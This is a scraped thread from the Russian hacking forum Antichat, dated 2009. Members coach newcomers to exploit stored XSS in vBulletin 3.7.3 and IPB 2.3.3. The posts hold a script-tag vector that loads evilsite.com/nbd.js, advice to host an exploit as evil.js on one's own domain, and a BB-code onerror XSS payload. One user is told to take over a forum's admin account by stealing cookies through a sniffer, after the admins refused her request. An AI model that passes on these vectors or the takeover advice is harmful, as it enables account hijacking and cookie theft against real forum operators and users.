Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.02.2009, 12:32
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019
Репутация:
214
|
|
Сообщение от it's mу
http://www.hackzone.ru/exploit/view/id/3249/
А как пользоваться? Я новичёк в этом и нужно учиться 
|
|
|
18.02.2009, 12:38
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
Сообщение от 1ce666
А как пользоваться? Я новичёк в этом и нужно учиться :/ там есть описание:
Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
with the visitor messages addon (a clone of a social network wall/comment area).
When posting XSS, the data is run through htmlentities(); before being displayed
to the general public/forum members. However, when posting a new message,
a new notification is sent to the commentee. The commenter posts a XSS vector such as
<script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
and I have included an example worm that makes the user post a new thread with your own
specified subject and message.
|
|
|
|
18.02.2009, 12:41
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019
Репутация:
214
|
|
- Описание = критическая уязвимость существует в новых Справка 3.7.3 программное обеспечение, которое поставляется включен
с посетителем сообщений аддон (клон социальной сети стены / комментарий область).
При публикации XSS, данные проходят через htmlentities (); затем отображается
для широкой публики / участники форума. Однако, при отправке нового сообщения
новое уведомление направляется commentee. Комментатор должности XSS вектор таких, как
<script src="http://evilsite.com/nbd.js">, и когда commentee посещений usercp.php
в рамках домена, они били нефильтрованное XSS приложу. XSRF также легко доступны
и я включил пример червя, что позволяет пользователю создать новое нить с вашими собственными
указанной темы и сообщения.
Вот какой перевод получился , обьясни в крадце пожалуйста 
C меня плюсы
|
|
|
|
18.02.2009, 12:45
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
пихаешь сплоит в evil.js и льешь к себе на hack.com пишешь пост и цепляешь яваскрипт <script src=http://hack.com/evil.js>
|
|
|
|
18.02.2009, 12:56
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019
Репутация:
214
|
|
Создал файл , закинул туда сплоит и написать в теме пост с <script src=мой домен/evil.js>
А дальше что?
|
|
|
|
21.02.2009, 00:35
|
|
Новичок
Регистрация: 07.11.2008
Сообщений: 7
Провел на форуме:
45403
Репутация:
3
|
|
IPB (U) v1.3 Final пропатченный!! Чем можно ломануть????
r57ipb2 - не предлогать)
|
|
|
|
02.03.2009, 21:53
|
|
Новичок
Регистрация: 02.03.2009
Сообщений: 5
Провел на форуме:
8803
Репутация:
0
|
|
здравствуйте !
вот этот код
Код: IPB <-2.3.3. [img*]http://qw.ru/qw[url*]http://onerror=alert(/Hack/)//[/url*].jpg[/img*] Found by XenOtai from Veronal H2S Team. Работает в IE и Mozille.
работает на неком форуме IPB 2.3.3, появляется окно предупреждения "hack"
есть ли какое-нибудь практические применение у этого кода, кроме как пугать посетителей  ?
еше есть вопрос -
предыстория - на форуме IPB 2.3.3 мне нужно удалить свои темы, у пользователей такой возможности нет (на просьбы администраторы-модераторы не реагируют(правда, один раз ответили, в не очень вежливой форме  )
вопрос - какие способы есть, чтобы заполучить права на удаление тем ? (лучше бы попроще  ) Я пакостить в форуме совсем не хочу, полезный он, нужно только удалить темы. |
|
|
|
02.03.2009, 22:01
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
это активная xss, о спосабах применения этой баги читай в разделе статьи!! права на удление проще всего получить поимев акк админа ;-)
|
|
|
|
02.03.2009, 23:56
|
|
Новичок
Регистрация: 02.03.2009
Сообщений: 5
Провел на форуме:
8803
Репутация:
0
|
|
читаю, если правильно поняла, то активная xss помогает стащить куки, только не понятно мне, как же куки утащить и где их потом искать
если это поможет завладеть админскими правами  |
|
|
|
05.03.2009, 18:11
|
|
Новичок
Регистрация: 02.03.2009
Сообщений: 5
Провел на форуме:
8803
Репутация:
0
|
|
дата время
IP: ******* (whois) Real IP*: ************
QUERY: пусто
REFERER: http://*************
AGENT: сведения осистеме
1. что такое QUERY ?
2. из кодов, приведенных на сайте со сниффером, работает один c bb-кодами, c javascript - нет
из этой статьи http://old.antichat.ru/txt/IPB/ код с Video не работает (подопытный форум не поддерживает этот тег)
пробовала заменить на другие типа имг -  данные снифферу не передает, а страница какая-то закореженная становится
в каком направлении теперь рыть ?
может с этим что нужно сделать
[img*]http://qw.ru/qw[url*]http://onerror=alert(/Hack/)//[/url*].jpg[/img*]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.gif){kind=avatar}
![Отправить сообщение для [aywo] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
